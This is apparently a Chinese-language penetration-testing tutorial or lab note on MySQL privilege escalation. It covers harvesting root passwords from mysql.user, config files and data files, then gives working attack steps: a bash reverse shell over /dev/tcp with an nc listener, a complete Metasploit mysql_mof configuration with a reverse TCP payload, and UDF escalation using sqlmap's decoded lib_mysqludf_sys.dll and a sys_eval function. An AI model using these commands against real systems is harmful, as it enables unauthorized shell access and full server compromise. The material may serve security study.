Mysql提权

mysql提权基础

 mysql通常在php语言中用的比较多
 连接数据库的文件名一般为conn.php、config.php、common.inc.php、config.inc.php等
 mysql的提权一般需要root用户

密码的获取

 1、数据库查询
  select Host,user,password from mysql.user (查询该表需要root权限)

 2、配置文件读取
  类似未删除的备份文件、git等开源平台、一些打包的压缩文件造成的源码或者配置文件泄露

 3、下载user文件
  在mysql的data目录下，user.frm、user.MYD、user.MYT可能存在有密码的信息

select @@basedir  获取当前数据库的地址
select @@plugin_dir  插件目录，mysql版本>5.1才有插件目录

提权

 简单粗暴的system反弹shell
  mysql中root用户可以用system + 命令来执行系统命令
  system whoami; 执行whoami命令

  反弹shell：
  攻击机监听：nc -lvvp 7777 （在7777端口监听）

  靶机：id=1;system bash -i >& /dev/tcp/ip/port 0>&1

  此时攻击机反弹shell，可以执行命令

 尝试失败的mof提权
  在windows的 c:/windows/system32/wbem/mof/ 目录下，里面的mof文件每个一段时间便会执行一次
  当我们知道了mysql的账号密码并且可以连接后，可以尝试用msf的攻击模块提权

  msfconsole下：
   use exploit/windows/mysql/mysql_mof
   set rhost xxx.xxx.xxx.xxx  (目标IP)
   set rport 3306 （远程连接数据库的端口）
   set username root  (远程连接的数据库账户)
   set password 123456  （远程连接的密码）
   set lhost xxx.xxx.xxx.xxx (反弹shell的地址)
   set lport 7777  （反弹shell的端口）
   set payload windows/shell_reverse_tcp （设置攻击载荷）

   exploit 开始攻击

   提示上传成功了但是没有会话，不知道为什么，正常结果的话等待一段时间会反弹shell回来

   然后我在攻击机上执行nc -lvvp 6666监听
   去靶机点击执行msf上传到c:/windows/system32的exe文件

   然后反弹shell了，怀疑mof里面的文件根本没有自动执行

 老生常谈udf提权
  UDF（user defined function），用户自定义函数，可以用于自定义函数来执行命令。需要mysql安装udf

  mysql版本大于5.1，使用select @@plugin_dir语句查看插件安装的目录

  mysql版本小于5.1，windows 2000下放置在c:/winnt/system32目录，否则就放在c:/windows/system32的目录下

  udf.dll文件在哪里找呢，在sqlmap下就有
  在sqlmap的目录下 ./udf/mysql/中就能找到，我的靶机版本是32位的

  高版本的sqlmap会将该文件加密将文件移动到./extra/cloak/中，使用cloak.py解码
  python2 cloak.py -d -i lib_mysqludf_sys.dll_
  解码完成后就有dll文件了，复制到插件目录

  复制完成后执行create function sys_eval returns string soname "lib_mysqludf_sys.dll"，创建里面的函数，注意这里不用输入dll的绝对路径